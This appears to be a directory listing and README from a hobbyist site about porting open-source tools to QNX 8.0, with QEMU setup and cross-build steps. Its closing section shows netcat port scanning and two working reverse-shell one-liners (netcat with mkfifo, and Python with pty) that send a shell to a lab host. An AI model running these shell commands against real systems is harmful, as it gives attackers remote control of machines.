Index of /QNX/8.0/
| Name | Last Modified | Size | Type |
|---|
| ../ | | - | Directory |
| SRC/ | 2025-Aug-22 18:09:31 | - | Directory |
| aarch64le/ | 2025-Aug-10 11:23:45 | - | Directory |
| binutils/ | 2025-Aug-11 07:49:33 | - | Directory |
| build_files/ | 2025-Aug-11 17:33:51 | - | Directory |
| bwBASIC/ | 2025-Aug-21 07:44:41 | - | Directory |
| dopewars/ | 2025-Aug-12 11:07:26 | - | Directory |
| netcat-openbsd/ | 2025-Aug-22 21:35:46 | - | Directory |
| nethack/ | 2025-Aug-19 14:02:55 | - | Directory |
| tnylpo/ | 2025-Aug-17 09:09:27 | - | Directory |
| tor/ | 2025-Aug-18 10:12:12 | - | Directory |
| x86_64/ | 2025-Aug-10 11:24:41 | - | Directory |
| zork/ | 2025-Aug-16 20:26:44 | - | Directory |
| README.txt | 2025-Aug-22 21:45:38 | 6.6K | text/plain; charset=utf-8 |
| ufetch | 2025-Aug-12 18:58:40 | 0.7K | application/octet-stream |
_____ _ _ __ __ _____ _____
| _ | \ | |\ \ / / | _ || _ |
| | | | \| | \ V / \ V / | |/' |
| | | | . ` | / \ / _ \ | /| |
\ \/' / |\ |/ /^\ \ | |_| |\ |_/ /
\_/\_\_| \_/\/ \/ \_____(_)___/
---------------------------------------
Install QNX license and Linux SDP installation (~/.qnx and ~/qnx800 by default)
- https://www.qnx.com/products/everywhere/ (Non-Commercial Use)
Im on an arm64 Mac so I had to use qemu-system-x86_64 Debian12 image to to get Linux SDP installation up.
Its not the fastest of the solutions, but it allows me to work on the QNX8 ports quite well.
We will be installing the Linux SDP only since we won't need the QNX IDE and we will work in the command line all the time.
Make sure you have enough disk space on the x86_64 Linux where QNX SDP installation would reside (make sure you have at least 20 GB free disk space !)
Once Linux SDP installation is in place, we will test create a default QNX8 x86_64 Qemu disk image to test with our local Qemu (in my case on my arm64 Mac)
1.1) GETTING THE BUILD ENVIRONMENT UP AND RUNNING DEFAULT QNX8 DISK IMAGE
On the host Linux we will load the SDP environment variables in our shell first.
$ source $HOME/qnx800/qnxsdp-env.sh
(you should see this)
-------------------------------------------------------
QNX_HOST=/home/user/qnx800/host/linux/x86_64
QNX_TARGET=/home/user/qnx800/target/qnx
MAKEFLAGS=-I/home/user/qnx800/target/qnx/usr/include
-------------------------------------------------------
$ mdkir $HOME/qnx800/IMG
$ cd $HOME/qnx800/IMG
(next we build the default image, note that Im usging authorized_keys for root access to the QNX8 image)
((Pleaae note that the default architecture for this is x86_64))
(((You can speficy --arch=aarch64le during the mkqnximage build command to build arm64 Qemu image but for this you need licenses)))
mkqnximage --clean --type=qemu --build --cryptodev=yes --ssh-ident=/home/user/.ssh/authorized_keys --sys-size=200 --sys-inodes=10000 --data-size=500 --data-inodes=20000 --python=yes --hostname=qnx802
(Once the image is built, you can upload these files to your host/arm64 mac given you have created $HOME/KVM/x86/QNX8 directory first)
$ scp output/disk-qemu* user@10.0.2.2:~/KVM/x86/QNX8
$ scp output/ifs.bin user@10.0.2.2:~/KVM/x86/QNX8
(On my arm64 Mac I have the following qemu loader script for the QNX8 image)
-------------------------------------------------------------------------------------------
#!/bin/sh
qemu-system-x86_64 \
-smp 2 \
--cpu max \
-m 1G \
-drive file=disk-qemu.vmdk,if=ide,id=drv0 \
-pidfile qemu.pid \
-kernel ifs.bin \
-serial mon:stdio \
-object rng-random,filename=/dev/urandom,id=rng0 \
-device virtio-rng-pci,rng=rng0 \
-netdev user,id=u1,hostfwd=tcp::2223-:22,hostfwd=tcp::9443-:443,hostfwd=tcp::8081-:80 \
-device virtio-net,netdev=u1 \
-no-reboot
-------------------------------------------------------------------------------------------
(Make sure you have uploaded the dosk-qemu.vmdk, disk-qemu and ifs.bin files to the working Qemu directory)
(Once you boot the x86_64 QNX8 image you can ssh as root using a private keypair as defined by the authorized_keys given during the mkqnximage build command.
$ ssh -XC -p 2223 -o "StrictHostKeyChecking no" root@127.0.0.1
1.2) PORTING TOOLS TO QNX8
There is a public project on Github that focuses on porting open source software to QNX8
https://github.com/qnx-ports/build-files
I have used the HOWTOs from their repo and created some of my custom ports for QNX8 which you can find on this page
https://astr0baby.online/QNX/8.0/build_files (cutom ports)
https://astr0baby.online/QNX/8.0/SRC/ (custom ports sources)
As of now I have managed to port the follwing programs to QNX8
bcrypt-1.1 (UNIX/Linux file encryption/decryption using blowfish)
links-2.30 (UNIX/Linux console www browser)
lynx-2.9.2 (UNIX/Linux console www browser)
nasm-2.16.03 (UNIX/Linux x86_64 assembler)
netcat-0.7.1 (UNIX/Linux TCP swiss-army knife)
dopewars-1.6.2 (UNIX/Linux Drug dealing game - server/client)
rogue-5.4.4 (UNIX/Linux Dungeon crawler in ASCII)
binutils-2.45 (UNIX/Linux programming tools)
bcrypt-1.1 (UNIX/Linux Blowfish crypter)
hexdump-1.0 (UNIX/Linux hexeditor)
nasm-2.16.03 (UNIX/Linux assember)
irssi-1.4.5 (UNIX/Linux irc client)
tor-0.4.8.17 (UNIX/Linux anonymity software)
lighttpd-1.4 (UNIX/Linux fast web server)
All my ports use the following filesystem prefix /data/usr/local
You can find the binaries (and upload them via scp to the QNX8 disk image running in qemu)
https://astr0baby.online/QNX/8.0/aarch64le/data
https://astr0baby.online/QNX/8.0/x86_64/data
Building the custom ports on the x86_64 Linux with SDP and qnx_ports
(on the x86_64 Debian12 VM in qemu)
$ source ~/qnx800/qnxsdp-env.sh
$ mkdir ~/qnx800/SRC
$ cd ~/qnx800/SRC
$ git clone https://github.com/qnx-ports/build-files
(you can copy some of my ports and test)
$ cd ~/qnx800/SRC/build-files
$ curl https://astr0baby.online/QNX/8.0/build_files/ports/netcat.tgz -o netcat.tgz
$ tar -zxvf netcat.tgz
$ rm netcat.tgz
$ cd ~/qnx800/SRC
$ curl https://astr0baby.online/QNX/8.0/SRC/netcat-0.7.1.tgz
$ tar -zxvf netcat-0.7.1.tgz
$ rm netcat-0.7.1.tgz
(cross-build netcat)
$ cd $HOME/qnx800/SRC
$ QNX_PROJECT_ROOT="$(pwd)/netcat-0.7.1" make -C build-files/ports/netcat install
(clean netcat build dirs)
$ cd $HOME/qnx800/SRC
$ QNX_PROJECT_ROOT="$(pwd)/netcat-0.7.1" make -C build-files/ports/netcat clean
(binaries will be then cross-compiled to
~/qnx800/target/qnx/aarch64le/data
~/qnx800/target/qnx/x86_64/data
(these then need to be uploaded to the QNX8 VM running under qemu via scp)
1.3) SOME NOTABLE OBSERVATIONS ABOUT QNX8
You can use netcat as a port scanner on the QNX8 image (since there are some core functions missing for libpcap to cross-compile and get nmap/masscan built for QNX8)
# /data/usr/local/bin/nc -zv 10.0.2.2 21 22 23 80 4000 4001
10.0.2.2 22 open
10.0.2.2 4001 open
(And get daemon headers of on the open ports)
# /data/usr/local/bin/nc -vv 10.0.2.2 22
Warning: Inverse name lookup failed for `10.0.2.2'
10.0.2.2 22 open
SSH-2.0-OpenSSH_9.9
Invalid SSH identification string.
Total received bytes: 57
Total sent bytes: 1
netcat reverse shell
QNX8> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| /data/usr/local/bin/nc 10.0.2.2 9001 >/tmp/f
Host> nc -nlvp 9001
python reverse shell
QNX8> export RHOST="10.0.2.2";export RPORT=9001;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
Host> nc -nlvp 9001